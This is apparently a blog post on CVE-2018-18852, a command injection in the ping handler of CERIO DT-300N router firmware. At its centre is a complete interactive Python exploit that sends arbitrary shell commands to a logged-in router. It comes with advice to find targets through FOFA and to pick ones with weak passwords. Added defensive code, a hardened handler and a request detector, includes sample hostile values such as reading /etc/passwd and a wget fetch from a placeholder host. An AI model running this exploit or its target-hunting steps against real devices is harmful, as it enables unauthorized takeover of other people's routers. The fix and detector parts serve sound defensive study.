
CVE-2018-18852: a simple exploit


Vulnerability details

CERIO DT-300N is a wireless router made by CERIO (智鼎资讯) of Taiwan. DT-300N firmware versions 1.1.6 through 1.1.12 contain an OS command injection vulnerability in the ping function of the web management interface: the target address is passed to a shell without being validated, so a logged-in attacker who appends shell metacharacters to it can execute arbitrary commands on the device.
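The bug class described above, as an added example (this is neither the router's firmware nor code from this page): a CGI-style ping handler that splices the `ip` field into a shell command line, beside a hardened version that accepts only an IP literal and never invokes a shell. `PING_CMD` and `PING_ARGV` are stand-ins that use `echo` so the script runs offline; on the real device the command is assumed to be `ping`.

```python
import ipaddress
import subprocess

# Stand-in for the router's ping binary so the example runs offline and
# without network access (assumption: the real handler runs "ping -c 1").
PING_CMD = "echo pinging"            # used by the vulnerable variant (shell string)
PING_ARGV = ["echo", "pinging"]      # used by the hardened variant (argv list)


def ping_vulnerable(ip: str) -> str:
    """Model of the flawed handler: the 'ip' form field is concatenated into a
    shell command line, so a ';' ends the ping command and starts an
    attacker-chosen one. Returns the combined stdout of everything that ran."""
    cmd = PING_CMD + " " + ip
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_hardened(ip: str) -> str:
    """Fixed handler: parse the field as an IP literal (ValueError on anything
    else) and pass it as one argv element, so no shell ever sees it."""
    addr = ipaddress.ip_address(ip.strip())
    return subprocess.run(PING_ARGV + [str(addr)], capture_output=True, text=True).stdout


def is_injected(ip: str) -> bool:
    """True if the hardened handler would reject this 'ip' value."""
    try:
        ipaddress.ip_address(ip.strip())
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    benign = "127.0.0.1"
    # Same shape as the exploit's payload: the "[[[" marker lets the attacker
    # locate the command output inside the returned page.
    hostile = '127.0.0.1;echo "[[[";id'
    print(ping_vulnerable(hostile))      # runs "id" after printing the marker
    print(ping_hardened(benign))
    try:
        ping_hardened(hostile)
    except ValueError as exc:
        print("rejected:", exc)
```

The fix is the pair of changes together: validating the value as an address removes metacharacters from the input space, and the argv form removes the shell from the execution path, so even a future parser bug cannot turn the value back into a command.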

Exploitation

Find targets running a vulnerable version. Here the FOFA search title="CERIO" was used to locate candidates; then pick one with a weak password and log in, since the injection sits behind the management interface's HTTP Basic authentication.

Save the following script as ok.py (the code is by its original author, 九世):

    #author:九世
    #time:2019/1/30
    # Cleaned-up copy of the script: the page extractor had dropped every "+"
    # in the string concatenations, and the two per-model loops are merged
    # into one helper. Behaviour is unchanged: log in with HTTP Basic auth,
    # POST to the PING handler to obtain a pid, then send an "ip" value of
    # the form 127.0.0.1;echo "[[[";<cmd> with that pid and print whatever
    # the router returns after the marker.
    import base64
    import json
    import sys

    import requests


    class Demo:
        def __init__(self, headers, url, payload, url2):
            self.headers = headers
            self.url = url        # main.cgi?cgi=PING&mode=9  (DT-300N-NGS-M)
            self.payload = payload
            self.url2 = url2      # Save.cgi?cgi=PING         (DT-300N)

        def requet(self):
            ver = 'DT-300N-NGS-M'
            ver2 = 'DT-300N'
            # Probe main.cgi first; a 404 means the other firmware line.
            rqt = requests.post(url=self.url, headers=self.headers, data=self.payload)
            if rqt.status_code == requests.codes.ok:
                print('[+] Router version number is {}'.format(ver))
                self.shell(self.url, ver)
            elif rqt.status_code == requests.codes.not_found:
                print('[-] Router version number is not {}'.format(ver))
                rqts = requests.post(url=self.url2, headers=self.headers, data=self.payload)
                if rqts.status_code == requests.codes.ok:
                    print('[+] Router version number is {}'.format(ver2))
                    self.shell(self.url2, ver2)
                elif rqts.status_code == requests.codes.not_found:
                    print('[-] Router version number is not {}'.format(ver2))
                    sys.exit()
                elif rqts.status_code == requests.codes.unauthorized:
                    print('[-] Auth is invalid, try other creds')
                    sys.exit()

        def shell(self, url, ver):
            # Interactive loop (Ctrl-C to leave): every command re-requests the
            # PING page for a fresh pid, then sends the injected "ip" value.
            while True:
                rqt = requests.post(url=url, headers=self.headers, data=self.payload)
                nary = json.loads(rqt.content)
                cmd = input('command:')
                # Assumption: both firmware lines return the pid as nary['pid'];
                # the original passed the whole JSON object for DT-300N.
                payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd,
                           'pid': nary['pid'], 'Times': 1}
                self.command(url, self.headers, payload, ver)

        def command(self, url, header, data, ver):
            rsv = requests.post(url=url, headers=header, data=data)
            if ver == 'DT-300N':
                print(rsv.text.split('/html')[1])   # Save.cgi: output follows the page
            else:
                print(rsv.text.split('[[[')[1])     # main.cgi: output follows the marker


    if __name__ == '__main__':
        print('[&]')
        print('[!] CERIO DT-300N-NGS-M\n[!] CERIO DT-300N')
        print('')
        path = '/cgi-bin/main.cgi?cgi=PING&mode=9'
        path2 = '/cgi-bin/Save.cgi?cgi=PING'
        user = input('host:').strip()
        ports = input('port:').strip()
        username = input('creds:').strip()          # entered as user:password
        creds = base64.b64encode(username.encode('utf-8')).decode('utf-8')
        if ports == '443':
            t = 'https://'
        else:
            t = 'http://'
        urls = t + user + ':' + ports + path
        urls2 = t + user + ':' + ports + path2
        payload = {'cgi': 'PING', 'mode': 9}
        headers = {'content-type': 'application/json', 'Host': user,
                   'Accept-Encoding': 'gzip, deflate', 'Content-Length': '0',
                   'Connection': 'keep-alive',
                   'Authorization': 'Basic {}'.format(creds)}
        obj = Demo(headers=headers, payload=payload, url=urls, url2=urls2)
        obj.requet()
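As an added example (not the exploit author's code), the other side of the same traffic: a detector for the request shape the script above sends. It flags POSTs to the PING handler whose `ip` field is not a bare IP literal and extracts the injected tail for the alert. The request records are constructed here in the exploit's form (path plus form-encoded body); they are not captured from a real device, and a real deployment would need something, such as a reverse proxy or IDS, that sees POST bodies.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Constructed request records (method, path, form-encoded body) modelled on
# the exploit's two POSTs. Not captured from a real device.
REQUESTS = [
    ("POST", "/cgi-bin/main.cgi?cgi=PING&mode=9", "cgi=PING&mode=9"),
    ("POST", "/cgi-bin/main.cgi?cgi=PING&mode=9",
     "ip=127.0.0.1%3Becho+%22%5B%5B%5B%22%3Bcat+%2Fetc%2Fpasswd&pid=1234&Times=1"),
    ("POST", "/cgi-bin/Save.cgi?cgi=PING", "ip=8.8.8.8&pid=77&Times=1"),
    ("POST", "/cgi-bin/Save.cgi?cgi=PING",
     "ip=8.8.8.8%7Cwget+http%3A%2F%2Fexample.invalid%2Fx&pid=78&Times=1"),
    ("GET", "/cgi-bin/main.cgi?cgi=STATUS", ""),
]

# Characters that end or chain a command in a POSIX shell.
SHELL_META = set(";|&`$\n")


def is_ping_request(method, path):
    """True for a POST whose query string selects the PING cgi handler."""
    query = parse_qs(urlsplit(path).query)
    return method == "POST" and query.get("cgi") == ["PING"]


def injected_command(ip_value):
    """None if the value is a plain IP literal. Otherwise the text from the
    first shell metacharacter onward, or the whole value if it has none
    (not an address, so still worth an alert)."""
    try:
        ipaddress.ip_address(ip_value.strip())
        return None
    except ValueError:
        pass
    idx = min((ip_value.find(c) for c in SHELL_META if c in ip_value), default=-1)
    return ip_value[idx:] if idx >= 0 else ip_value


def detect(records):
    """Return (path, injected_tail) for every PING request with a hostile ip."""
    hits = []
    for method, path, body in records:
        if not is_ping_request(method, path):
            continue
        for value in parse_qs(body).get("ip", []):
            tail = injected_command(value)
            if tail is not None:
                hits.append((path, tail))
    return hits


if __name__ == "__main__":
    for path, tail in detect(REQUESTS):
        print("ALERT {} ip field tail: {!r}".format(path, tail))
```

Matching on "not an IP literal" rather than on a list of bad characters is deliberate: it is the same predicate the fixed handler would enforce, so the detector and the patch agree on what counts as legitimate input, and encodings or metacharacters the list forgot still trip it.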

Run the command


python3 ok.py   

When exploitation succeeds, the output of the injected command is returned in the response; here it shows the current user's information.

Note: this experiment may not be used for commercial purposes; it is for learning and exchange only, and you bear all consequences yourself.
